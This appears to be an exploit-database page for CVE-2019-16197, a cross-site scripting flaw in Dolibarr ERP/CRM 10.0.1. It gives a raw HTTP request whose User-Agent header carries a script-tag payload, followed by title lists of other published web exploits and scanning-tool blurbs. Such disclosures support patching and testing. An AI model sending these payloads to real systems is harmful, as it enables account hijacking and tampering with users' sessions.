"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting"

Author

Exploit author

"Metin Yunus Kandemir"

Platform

Exploit platform

php

Release date

Exploit published date

2019-09-13

 Download file
# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross
Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# CVE: CVE-2019-16197
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
software package to manage your business...
==================================================================

Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of
the User-Agent HTTP header is copied into the HTML document as plain text
between tags, leading to XSS.

GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>

Release Date	Title	Type	Platform	Author
2020-05-29	"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"	webapps	multiple	"Halis Duraki"
2020-05-29	"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"	webapps	php	UnD3sc0n0c1d0
2020-05-28	"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"	webapps	php	"China Banking and Insurance Information Technology Management Co."
2020-05-28	"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"	webapps	multiple	"Berk Dusunur"
2020-05-28	"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"	webapps	php	Th3GundY
2020-05-28	"Online-Exam-System 2015 - 'fid' SQL Injection"	webapps	php	"Berk Dusunur"
2020-05-27	"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"	webapps	php	"China Banking and Insurance Information Technology Management Co."
2020-05-27	"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"	webapps	php	"that faceless coder"

Release Date	Title	Type	Platform	Author
2020-05-29	"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"	webapps	php	UnD3sc0n0c1d0
2020-05-28	"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"	webapps	php	Th3GundY
2020-05-28	"Online-Exam-System 2015 - 'fid' SQL Injection"	webapps	php	"Berk Dusunur"
2020-05-28	"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"	webapps	php	"China Banking and Insurance Information Technology Management Co."
2020-05-27	"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"	webapps	php	"China Banking and Insurance Information Technology Management Co."
2020-05-27	"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"OXID eShop 6.3.4 - 'sorting' SQL Injection"	webapps	php	VulnSpy
2020-05-27	"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"	webapps	php	"that faceless coder"
2020-05-27	"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"

Release Date	Title	Type	Platform	Author
2020-04-21	"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting"	webapps	php	"Metin Yunus Kandemir"
2020-04-21	"CSZ CMS 1.2.7 - 'title' HTML Injection"	webapps	php	"Metin Yunus Kandemir"
2020-03-20	"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"	webapps	php	"Metin Yunus Kandemir"
2020-01-07	"Complaint Management System 4.0 - Remote Code Execution"	webapps	php	"Metin Yunus Kandemir"
2020-01-03	"Online Course Registration 2.0 - Remote Code Execution"	webapps	php	"Metin Yunus Kandemir"
2020-01-01	"Shopping Portal ProVersion 3.0 - Authentication Bypass"	webapps	php	"Metin Yunus Kandemir"
2020-01-01	"Hospital Management System 4.0 - Authentication Bypass"	webapps	php	"Metin Yunus Kandemir"
2019-12-09	"Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting"	webapps	php	"Metin Yunus Kandemir"
2019-09-13	"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting"	webapps	php	"Metin Yunus Kandemir"
2019-09-09	"Dolibarr ERP-CRM 10.0.1 - SQL Injection"	webapps	php	"Metin Yunus Kandemir"
2019-09-09	"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection"	webapps	php	"Metin Yunus Kandemir"
2019-08-01	"Ultimate Loan Manager 2.0 - Cross-Site Scripting"	webapps	multiple	"Metin Yunus Kandemir"
2019-07-12	"MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting"	webapps	php	"Metin Yunus Kandemir"
2019-06-24	"dotProject 2.1.9 - SQL Injection"	webapps	php	"Metin Yunus Kandemir"
2019-05-29	"Free SMTP Server 2.5 - Denial of Service (PoC)"	dos	windows	"Metin Yunus Kandemir"
2019-04-03	"PhreeBooks ERP 5.2.3 - Remote Command Execution"	remote	python	"Metin Yunus Kandemir"

import requests

response = requests.get('https://www.nmmapper.com/api/exploitdetails/47384/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Search for hundreds of thousands of exploits

"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting"

Download file

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.